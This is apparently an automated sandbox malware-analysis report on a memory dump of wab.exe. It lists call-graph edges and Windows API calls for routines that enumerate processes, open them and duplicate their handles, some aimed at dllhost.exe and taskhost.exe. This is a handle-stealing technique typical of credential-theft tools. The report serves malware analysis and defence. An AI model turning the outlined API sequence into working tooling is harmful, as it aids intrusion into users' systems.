39782->38914 39783->38914 39784->38914 39785->38914 39786->38889 39787->38911 39820 4096c3 CreateFileW 39788->39820 39790 40cc34 39791 40cc3d GetFileSize 39790->39791 39792 40bbca 39790->39792 39793 40afcf 2 API calls 39791->39793 39792->39731 39800 40cf04 39792->39800 39794 40cc64 39793->39794 39821 40a2ef ReadFile 39794->39821 39796 40cc71 39822 40ab4a MultiByteToWideChar 39796->39822 39798 40cc95 FindCloseChangeNotification 39799 40b04b ??3@YAXPAX 39798->39799 39799->39792 39801 40b633 ??3@YAXPAX 39800->39801 39802 40cf14 39801->39802 39828 40b1ab ??3@YAXPAX ??3@YAXPAX 39802->39828 39804 40bbdd 39804->39731 39804->39736 39805 40cf1b 39805->39804 39807 40cfef 39805->39807 39829 40cd4b 39805->39829 39808 40cd4b 14 API calls 39807->39808 39808->39804 39810 40b633 ??3@YAXPAX 39809->39810 39811 40cc15 39810->39811 39812 40aa04 ??3@YAXPAX 39811->39812 39813 40cc1d 39812->39813 39878 40b1ab ??3@YAXPAX ??3@YAXPAX 39813->39878 39815 40b7d4 memset CreateFileW 39815->38869 39815->38870 39816->39739 39817->39741 39818->39749 39819->39752 39820->39790 39821->39796 39823 40ab6b 39822->39823 39827 40ab93 39822->39827 39824 40a9ce 4 API calls 39823->39824 39825 40ab74 39824->39825 39826 40ab7c MultiByteToWideChar 39825->39826 39826->39827 39827->39798 39828->39805 39830 40cd7b 39829->39830 39863 40aa29 39830->39863 39832 40cef5 39833 40aa04 ??3@YAXPAX 39832->39833 39834 40cefd 39833->39834 39834->39805 39836 40aa29 6 API calls 39837 40ce1d 39836->39837 39838 40aa29 6 API calls 39837->39838 39839 40ce3e 39838->39839 39840 40ce6a 39839->39840 39871 40abb7 wcslen memmove 39839->39871 39841 40ce9f 39840->39841 39874 40abb7 wcslen memmove 39840->39874 39843 40a8d0 7 API calls 39841->39843 39847 40ceb5 39843->39847 39844 40ce56 39872 40aa71 wcslen 39844->39872 39846 40ce8b 39875 40aa71 wcslen 39846->39875 39853 40a8d0 7 API calls 39847->39853 39850 40ce5e 39873 40abb7 wcslen memmove 39850->39873 39851 40ce93 39876 40abb7 wcslen memmove 39851->39876 39855 40cecb 39853->39855 39877 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39855->39877 39857 40cedd 39858 40aa04 ??3@YAXPAX 39857->39858 39859 40cee5 39858->39859 39860 40aa04 ??3@YAXPAX 39859->39860 39861 40ceed 39860->39861 39862 40aa04 ??3@YAXPAX 39861->39862 39862->39832 39864 40aa33 39863->39864 39870 40aa63 39863->39870 39865 40aa44 39864->39865 39866 40aa38 wcslen 39864->39866 39867 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39865->39867 39866->39865 39868 40aa4d 39867->39868 39869 40aa51 memcpy 39868->39869 39868->39870 39869->39870 39870->39832 39870->39836 39871->39844 39872->39850 39873->39840 39874->39846 39875->39851 39876->39841 39877->39857 39878->39815 39879->39777 39880->38930 39881->38938 39891 44def7 39892 44df07 39891->39892 39893 44df00 ??3@YAXPAX 39891->39893 39894 44df17 39892->39894 39895 44df10 ??3@YAXPAX 39892->39895 39893->39892 39896 44df27 39894->39896 39897 44df20 ??3@YAXPAX 39894->39897 39895->39894 39898 44df37 39896->39898 39899 44df30 ??3@YAXPAX 39896->39899 39897->39896 39899->39898 37671 44dea5 37672 44deb5 FreeLibrary 37671->37672 37673 44dec3 37671->37673 37672->37673 39900 40b0b5 ??3@YAXPAX ??3@YAXPAX 39901 4148b6 FindResourceW 39902 4148f9 39901->39902 39903 4148cf SizeofResource 39901->39903 39903->39902 39904 4148e0 LoadResource 39903->39904 39904->39902 39905 4148ee LockResource 39904->39905 39905->39902 37850 415304 ??3@YAXPAX 39906 441b3f 39916 43a9f6 39906->39916 39908 441b61 40089 4386af memset 39908->40089 39910 44189a 39911 4418e2 39910->39911 39913 442bd4 39910->39913 39914 4418ea 39911->39914 40090 4414a9 12 API calls 39911->40090 39913->39914 40091 441409 memset 39913->40091 39917 43aa20 39916->39917 39918 43aadf 39916->39918 39917->39918 39919 43aa34 memset 39917->39919 39918->39908 39920 43aa56 39919->39920 39921 43aa4d 39919->39921 40092 43a6e7 39920->40092 40100 42c02e memset 39921->40100 39926 43aad3 40102 4169a7 11 API calls 39926->40102 39927 43aaae 39927->39918 39927->39926 39942 43aae5 39927->39942 39928 43ac18 39931 43ac47 39928->39931 40104 42bbd5 memcpy memcpy memcpy memset memcpy 39928->40104 39932 43aca8 39931->39932 40105 438eed 16 API calls 39931->40105 39936 43acd5 39932->39936 40107 4233ae 11 API calls 39932->40107 39935 43ac87 40106 4233c5 16 API calls 39935->40106 40108 423426 11 API calls 39936->40108 39940 43ace1 40109 439811 163 API calls 39940->40109 39941 43a9f6 161 API calls 39941->39942 39942->39918 39942->39928 39942->39941 40103 439bbb 22 API calls 39942->40103 39944 43acfd 39949 43ad2c 39944->39949 40110 438eed 16 API calls 39944->40110 39946 43ad19 40111 4233c5 16 API calls 39946->40111 39948 43ad58 40112 44081d 163 API calls 39948->40112 39949->39948 39952 43add9 39949->39952 40116 423426 11 API calls 39952->40116 39953 43ae3a memset 39954 43ae73 39953->39954 40117 42e1c0 147 API calls 39954->40117 39955 43adab 40114 438c4e 163 API calls 39955->40114 39956 43ad6c 39956->39918 39956->39955 40113 42370b memset memcpy memset 39956->40113 39960 43adcc 40115 440f84 12 API calls 39960->40115 39961 43ae96 40118 42e1c0 147 API calls 39961->40118 39964 43aea8 39965 43aec1 39964->39965 40119 42e199 147 API calls 39964->40119 39967 43af00 39965->39967 40120 42e1c0 147 API calls 39965->40120 39967->39918 39970 43af1a 39967->39970 39971 43b3d9 39967->39971 40121 438eed 16 API calls 39970->40121 39976 43b3f6 39971->39976 39977 43b4c8 39971->39977 39972 43b60f 39972->39918 40180 4393a5 17 API calls 39972->40180 39975 43af2f 40122 4233c5 16 API calls 39975->40122 40162 432878 12 API calls 39976->40162 39981 43b4f2 39977->39981 40168 42bbd5 memcpy memcpy memcpy memset memcpy 39977->40168 39979 43af51 40123 423426 11 API calls 39979->40123 40169 43a76c 21 API calls 39981->40169 39983 43af7d 40124 423426 11 API calls 39983->40124 39987 43af94 40125 423330 11 API calls 39987->40125 39988 43b529 40170 44081d 163 API calls 39988->40170 39989 43b462 40164 423330 11 API calls 39989->40164 39993 43b428 39993->39989 40163 432b60 16 API calls 39993->40163 39994 43afca 40126 423330 11 API calls 39994->40126 39995 43b47e 39999 43b497 39995->39999 40165 42374a memcpy memset memcpy memcpy memcpy 39995->40165 39996 43b544 39997 43b55c 39996->39997 40171 42c02e memset 39996->40171 40172 43a87a 163 API calls 39997->40172 40166 4233ae 11 API calls 39999->40166 40001 43afdb 40127 4233ae 11 API calls 40001->40127 40005 43b4b1 40167 423399 11 API calls 40005->40167 40007 43b56c 40010 43b58a 40007->40010 40173 423330 11 API calls 40007->40173 40009 43afee 40128 44081d 163 API calls 40009->40128 40174 440f84 12 API calls 40010->40174 40011 43b4c1 40176 42db80 163 API calls 40011->40176 40016 43b592 40175 43a82f 16 API calls 40016->40175 40019 43b5b4 40177 438c4e 163 API calls 40019->40177 40021 43b5cf 40178 42c02e memset 40021->40178 40023 43b005 40023->39918 40028 43b01f 40023->40028 40129 42d836 163 API calls 40023->40129 40024 43b1ef 40139 4233c5 16 API calls 40024->40139 40026 43b212 40140 423330 11 API calls 40026->40140 40028->40024 40137 423330 11 API calls 40028->40137 40138 42d71d 163 API calls 40028->40138 40030 43b087 40130 4233ae 11 API calls 40030->40130 40031 43add4 40031->39972 40179 438f86 16 API calls 40031->40179 40034 43b22a 40141 42ccb5 11 API calls 40034->40141 40037 43b23f 40142 4233ae 11 API calls 40037->40142 40038 43b10f 40133 423330 11 API calls 40038->40133 40040 43b257 40143 4233ae 11 API calls 40040->40143 40044 43b129 40134 4233ae 11 API calls 40044->40134 40045 43b26e 40144 4233ae 11 API calls 40045->40144 40048 43b09a 40048->40038 40131 42cc15 19 API calls 40048->40131 40132 4233ae 11 API calls 40048->40132 40049 43b282 40145 43a87a 163 API calls 40049->40145 40051 43b13c 40135 440f84 12 API calls 40051->40135 40053 43b29d 40146 423330 11 API calls 40053->40146 40056 43b2af 40059 43b2b8 40056->40059 40060 43b2ce 40056->40060 40057 43b15f 40136 4233ae 11 API calls 40057->40136 40147 4233ae 11 API calls 40059->40147 40148 440f84 12 API calls 40060->40148 40063 43b2c9 40150 4233ae 11 API calls 40063->40150 40064 43b2da 40149 42370b memset memcpy memset 40064->40149 40067 43b2f9 40151 423330 11 API calls 40067->40151 40069 43b30b 40152 423330 11 API calls 40069->40152 40071 43b325 40153 423399 11 API calls 40071->40153 40073 43b332 40154 4233ae 11 API calls 40073->40154 40075 43b354 40155 423399 11 API calls 40075->40155 40077 43b364 40156 43a82f 16 API calls 40077->40156 40079 43b370 40157 42db80 163 API calls 40079->40157 40081 43b380 40158 438c4e 163 API calls 40081->40158 40083 43b39e 40159 423399 11 API calls 40083->40159 40085 43b3ae 40160 43a76c 21 API calls 40085->40160 40087 43b3c3 40161 423399 11 API calls 40087->40161 40089->39910 40090->39914 40091->39913 40093 43a6f5 40092->40093 40096 43a765 40092->40096 40093->40096 40181 42a115 40093->40181 40096->39918 40101 4397fd memset 40096->40101 40098 43a73d 40098->40096 40099 42a115 147 API calls 40098->40099 40099->40096 40100->39920 40101->39927 40102->39918 40103->39942 40104->39931 40105->39935 40106->39932 40107->39936 40108->39940 40109->39944 40110->39946 40111->39949 40112->39956 40113->39955 40114->39960 40115->40031 40116->39953 40117->39961 40118->39964 40119->39965 40120->39965 40121->39975 40122->39979 40123->39983 40124->39987 40125->39994 40126->40001 40127->40009 40128->40023 40129->40030 40130->40048 40131->40048 40132->40048 40133->40044 40134->40051 40135->40057 40136->40028 40137->40028 40138->40028 40139->40026 40140->40034 40141->40037 40142->40040 40143->40045 40144->40049 40145->40053 40146->40056 40147->40063 40148->40064 40149->40063 40150->40067 40151->40069 40152->40071 40153->40073 40154->40075 40155->40077 40156->40079 40157->40081 40158->40083 40159->40085 40160->40087 40161->40031 40162->39993 40163->39989 40164->39995 40165->39999 40166->40005 40167->40011 40168->39981 40169->39988 40170->39996 40171->39997 40172->40007 40173->40010 40174->40016 40175->40011 40176->40019 40177->40021 40178->40031 40179->39972 40180->39918 40182 42a175 40181->40182 40184 42a122 40181->40184 40182->40096 40187 42b13b 147 API calls 40182->40187 40184->40182 40185 42a115 147 API calls 40184->40185 40188 43a174 40184->40188 40212 42a0a8 147 API calls 40184->40212 40185->40184 40187->40098 40202 43a196 40188->40202 40203 43a19e 40188->40203 40189 43a306 40189->40202 40232 4388c4 14 API calls 40189->40232 40192 42a115 147 API calls 40192->40203 40194 43a642 40194->40202 40236 4169a7 11 API calls 40194->40236 40198 43a635 40235 42c02e memset 40198->40235 40202->40184 40203->40189 40203->40192 40203->40202 40213 42ff8c 40203->40213 40221 415a91 40203->40221 40225 4165ff 40203->40225 40228 439504 13 API calls 40203->40228 40229 4312d0 147 API calls 40203->40229 40230 42be4c memcpy memcpy memcpy memset memcpy 40203->40230 40231 43a121 11 API calls 40203->40231 40205 43a325 40205->40194 40205->40198 40205->40202 40206 4169a7 11 API calls 40205->40206 40207 42b5b5 memset memcpy 40205->40207 40208 42bf4c 14 API calls 40205->40208 40211 4165ff 11 API calls 40205->40211 40233 42b63e 14 API calls 40205->40233 40234 42bfcf memcpy 40205->40234 40206->40205 40207->40205 40208->40205 40211->40205 40212->40184 40237 43817e 40213->40237 40215 42ff9d 40215->40203 40216 42ff99 40216->40215 40217 42ffe3 40216->40217 40218 42ffd0 40216->40218 40242 4169a7 11 API calls 40217->40242 40241 4169a7 11 API calls 40218->40241 40222 415a9d 40221->40222 40223 415ab3 40222->40223 40224 415aa4 memset 40222->40224 40223->40203 40224->40223 40386 4165a0 40225->40386 40228->40203 40229->40203 40230->40203 40231->40203 40232->40205 40233->40205 40234->40205 40235->40194 40236->40202 40238 438187 40237->40238 40240 438192 40237->40240 40243 4380f6 40238->40243 40240->40216 40241->40215 40242->40215 40245 43811f 40243->40245 40244 438164 40244->40240 40245->40244 40247 4300e8 3 API calls 40245->40247 40248 437e5e 40245->40248 40247->40245 40271 437d3c 40248->40271 40250 437eb3 40250->40245 40251 437ea9 40251->40250 40256 437f22 40251->40256 40286 41f432 40251->40286 40254 437f06 40333 415c56 11 API calls 40254->40333 40258 437f7f 40256->40258 40259 432d4e 3 API calls 40256->40259 40257 437f95 40334 415c56 11 API calls 40257->40334 40258->40257 40261 43802b 40258->40261 40259->40258 40262 4165ff 11 API calls 40261->40262 40263 438054 40262->40263 40297 437371 40263->40297 40266 43806b 40267 438094 40266->40267 40335 42f50e 138 API calls 40266->40335 40269 437fa3 40267->40269 40270 4300e8 3 API calls 40267->40270 40269->40250 40336 41f638 104 API calls 40269->40336 40270->40269 40272 437d69 40271->40272 40275 437d80 40271->40275 40337 437ccb 11 API calls 40272->40337 40274 437d76 40274->40251 40275->40274 40276 437da3 40275->40276 40277 437d90 40275->40277 40279 438460 134 API calls 40276->40279 40277->40274 40341 437ccb 11 API calls 40277->40341 40282 437dcb 40279->40282 40280 437de8 40340 424f26 123 API calls 40280->40340 40282->40280 40338 444283 13 API calls 40282->40338 40284 437dfc 40339 437ccb 11 API calls 40284->40339 40287 41f54d 40286->40287 40293 41f44f 40286->40293 40288 41f466 40287->40288 40371 41c635 memset memset 40287->40371 40288->40254 40288->40256 40293->40288 40295 41f50b 40293->40295 40342 41f1a5 40293->40342 40367 41c06f memcmp 40293->40367 40368 41f3b1 90 API calls 40293->40368 40369 41f398 86 API calls 40293->40369 40295->40287 40295->40288 40370 41c295 86 API calls 40295->40370 40372 41703f 40297->40372 40299 437399 40300 43739d 40299->40300 40303 4373ac 40299->40303 40379 4446ea 11 API calls 40300->40379 40302 4373a7 40302->40266 40304 416935 16 API calls 40303->40304 40305 4373ca 40304->40305 40307 438460 134 API calls 40305->40307 40311 4251c4 137 API calls 40305->40311 40315 415a91 memset 40305->40315 40317 425413 17 API calls 40305->40317 40318 43758f 40305->40318 40322 42533e 16 API calls 40305->40322 40329 42538f 16 API calls 40305->40329 40330 437584 40305->40330 40332 437d3c 135 API calls 40305->40332 40380 425433 13 API calls 40305->40380 40381 42453e 123 API calls 40305->40381 40306 4375bc 40309 415c7d 16 API calls 40306->40309 40307->40305 40310 4375d2 40309->40310 40310->40302 40312 4442e6 11 API calls 40310->40312 40311->40305 40313 4375e2 40312->40313 40313->40302 40384 444283 13 API calls 40313->40384 40315->40305 40317->40305 40382 42453e 123 API calls 40318->40382 40319 4375f4 40324 437620 40319->40324 40325 43760b 40319->40325 40322->40305 40323 43759f 40326 416935 16 API calls 40323->40326 40328 416935 16 API calls 40324->40328 40385 444283 13 API calls 40325->40385 40326->40330 40328->40302 40329->40305 40330->40306 40383 42453e 123 API calls 40330->40383 40331 437612 memcpy 40331->40302 40332->40305 40333->40250 40334->40269 40335->40267 40336->40250 40337->40274 40338->40284 40339->40280 40340->40274 40341->40274 40343 41bc3b 101 API calls 40342->40343 40344 41f1b4 40343->40344 40345 41edad 86 API calls 40344->40345 40352 41f282 40344->40352 40346 41f1cb 40345->40346 40347 41f1f5 memcmp 40346->40347 40348 41f20e 40346->40348 40346->40352 40347->40348 40349 41f21b memcmp 40348->40349 40348->40352 40350 41f326 40349->40350 40353 41f23d 40349->40353 40351 41ee6b 86 API calls 40350->40351 40350->40352 40351->40352 40352->40293 40353->40350 40354 41f28e memcmp 40353->40354 40356 41c8df 56 API calls 40353->40356 40354->40350 40355 41f2a9 40354->40355 40355->40350 40358 41f308 40355->40358 40359 41f2d8 40355->40359 40357 41f269 40356->40357 40357->40350 40360 41f287 40357->40360 40361 41f27a 40357->40361 40358->40350 40365 4446ce 11 API calls 40358->40365 40362 41ee6b 86 API calls 40359->40362 40360->40354 40363 41ee6b 86 API calls 40361->40363 40364 41f2e0 40362->40364 40363->40352 40366 41b1ca memset 40364->40366 40365->40350 40366->40352 40367->40293 40368->40293 40369->40293 40370->40287 40371->40288 40373 417044 40372->40373 40374 41705c 40372->40374 40376 416760 11 API calls 40373->40376 40378 417055 40373->40378 40375 417075 40374->40375 40377 41707a 11 API calls 40374->40377 40375->40299 40376->40378 40377->40373 40378->40299 40379->40302 40380->40305 40381->40305 40382->40323 40383->40306 40384->40319 40385->40331 40391 415cfe 40386->40391 40396 415d23 40391->40396 40398 41628e 40391->40398 40392 4163ca 40405 416422 11 API calls 40392->40405 40394 416422 10 API calls 40394->40396 40395 416172 memset 40395->40396 40396->40392 40396->40394 40396->40395 40397 415cb9 10 API calls 40396->40397 40396->40398 40397->40396 40399 416520 40398->40399 40400 416527 40399->40400 40404 416574 40399->40404 40402 416544 40400->40402 40400->40404 40406 4156aa 11 API calls 40400->40406 40403 416561 memcpy 40402->40403 40402->40404 40403->40404 40404->40203 40405->40398 40406->40402 40431 41493c EnumResourceNamesW 37675 4287c1 37676 4287d2 37675->37676 37677 429ac1 37675->37677 37678 428818 37676->37678 37679 42881f 37676->37679 37698 425711 37676->37698 37689 425ad6 37677->37689 37745 415c56 11 API calls 37677->37745 37712 42013a 37678->37712 37740 420244 97 API calls 37679->37740 37683 4260dd 37739 424251 120 API calls 37683->37739 37687 4259da 37738 416760 11 API calls 37687->37738 37692 422aeb memset memcpy memcpy 37692->37698 37693 429a4d 37694 429a66 37693->37694 37699 429a9b 37693->37699 37741 415c56 11 API calls 37694->37741 37696 4260a1 37737 415c56 11 API calls 37696->37737 37698->37677 37698->37687 37698->37692 37698->37693 37698->37696 37708 4259c2 37698->37708 37711 425a38 37698->37711 37728 4227f0 memset memcpy 37698->37728 37729 422b84 15 API calls 37698->37729 37730 422b5d memset memcpy memcpy 37698->37730 37731 422640 13 API calls 37698->37731 37733 4241fc 11 API calls 37698->37733 37734 42413a 90 API calls 37698->37734 37700 429a96 37699->37700 37743 416760 11 API calls 37699->37743 37744 424251 120 API calls 37700->37744 37703 429a7a 37742 416760 11 API calls 37703->37742 37708->37689 37732 415c56 11 API calls 37708->37732 37711->37708 37735 422640 13 API calls 37711->37735 37736 4226e0 12 API calls 37711->37736 37713 42014c 37712->37713 37716 420151 37712->37716 37755 41e466 97 API calls 37713->37755 37715 420162 37715->37698 37716->37715 37717 4201b3 37716->37717 37718 420229 37716->37718 37719 4201b8 37717->37719 37720 4201dc 37717->37720 37718->37715 37721 41fd5e 86 API calls 37718->37721 37746 41fbdb 37719->37746 37720->37715 37724 4201ff 37720->37724 37752 41fc4c 37720->37752 37721->37715 37724->37715 37727 42013a 97 API calls 37724->37727 37727->37715 37728->37698 37729->37698 37730->37698 37731->37698 37732->37687 37733->37698 37734->37698 37735->37711 37736->37711 37737->37687 37738->37683 37739->37689 37740->37698 37741->37703 37742->37700 37743->37700 37744->37677 37745->37687 37747 41fbf8 37746->37747 37750 41fbf1 37746->37750 37760 41ee26 37747->37760 37751 41fc39 37750->37751 37770 4446ce 11 API calls 37750->37770 37751->37715 37756 41fd5e 37751->37756 37753 41ee6b 86 API calls 37752->37753 37754 41fc5d 37753->37754 37754->37720 37755->37716 37758 41fd65 37756->37758 37757 41fdab 37757->37715 37758->37757 37759 41fbdb 86 API calls 37758->37759 37759->37758 37761 41ee41 37760->37761 37762 41ee32 37760->37762 37771 41edad 37761->37771 37774 4446ce 11 API calls 37762->37774 37765 41ee3c 37765->37750 37768 41ee58 37768->37765 37776 41ee6b 37768->37776 37770->37751 37780 41be52 37771->37780 37774->37765 37775 41eb85 11 API calls 37775->37768 37777 41ee70 37776->37777 37778 41ee78 37776->37778 37836 41bf99 86 API calls 37777->37836 37778->37765 37781 41be6f 37780->37781 37782 41be5f 37780->37782 37788 41be8c 37781->37788 37801 418c63 37781->37801 37815 4446ce 11 API calls 37782->37815 37785 41be69 37785->37765 37785->37775 37786 41bee7 37786->37785 37819 41a453 86 API calls 37786->37819 37788->37785 37788->37786 37789 41bf3a 37788->37789 37793 41bed1 37788->37793 37818 4446ce 11 API calls 37789->37818 37791 41bef0 37791->37786 37792 41bf01 37791->37792 37794 41bf24 memset 37792->37794 37796 41bf14 37792->37796 37816 418a6d memset memcpy memset 37792->37816 37793->37791 37795 41bee2 37793->37795 37794->37785 37805 41ac13 37795->37805 37817 41a223 memset memcpy memset 37796->37817 37800 41bf20 37800->37794 37804 418c72 37801->37804 37802 418c94 37802->37788 37803 418d51 memset memset 37803->37802 37804->37802 37804->37803 37806 41ac52 37805->37806 37807 41ac3f memset 37805->37807 37810 41ac6a 37806->37810 37820 41dc14 19 API calls 37806->37820 37808 41acd9 37807->37808 37808->37786 37812 41aca1 37810->37812 37821 41519d 37810->37821 37812->37808 37813 41acc0 memset 37812->37813 37814 41accd memcpy 37812->37814 37813->37808 37814->37808 37815->37785 37816->37796 37817->37800 37818->37786 37820->37810 37824 4175ed 37821->37824 37832 417570 SetFilePointer 37824->37832 37827 41760a ReadFile 37828 417637 37827->37828 37829 417627 GetLastError 37827->37829 37830 4151b3 37828->37830 37831 41763e memset 37828->37831 37829->37830 37830->37812 37831->37830 37833 4175b2 37832->37833 37834 41759c GetLastError 37832->37834 37833->37827 37833->37830 37834->37833 37835 4175a8 GetLastError 37834->37835 37835->37833 37836->37778 37837 417bc5 37839 417c61 37837->37839 37843 417bda 37837->37843 37838 417bf6 UnmapViewOfFile CloseHandle 37838->37838 37838->37843 37841 417c2c 37841->37843 37849 41851e 20 API calls 37841->37849 37843->37838 37843->37839 37843->37841 37844 4175b7 37843->37844 37845 4175d6 FindCloseChangeNotification 37844->37845 37846 4175c8 37845->37846 37847 4175df 37845->37847 37846->37847 37848 4175ce Sleep 37846->37848 37847->37843 37848->37845 37849->37841 39882 4147f3 39885 414561 39882->39885 39884 414813 39886 41456d 39885->39886 39887 41457f GetPrivateProfileIntW 39885->39887 39890 4143f1 memset _itow WritePrivateProfileStringW 39886->39890 39887->39884 39889 41457a 39889->39884 39890->39889

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 360 40de6e-40de71 359->360 360->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 377 40dffd-40e006 372->377 373->363 373->377 375 40df08 374->375 376 40dfef-40dff2 CloseHandle 374->376 378 40df0b-40df10 375->378 376->373 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->376 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                                                                                                                                                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                                          • API String ID: 594330280-3398334509
                                                                                                                                                                                                                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 ??3@YAXPAX@Z 644->647 649 413edb-413ee2 646->649 647->649 653 413ee4 649->653 654 413ee7-413efe 649->654 663 413ea2-413eae CloseHandle 651->663 657 413e61-413e68 652->657 658 413e37-413e44 GetModuleHandleW 652->658 653->654 654->639 657->651 660 413e6a-413e76 657->660 658->657 659 413e46-413e5c GetProcAddress 658->659 659->657 660->651 663->642
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
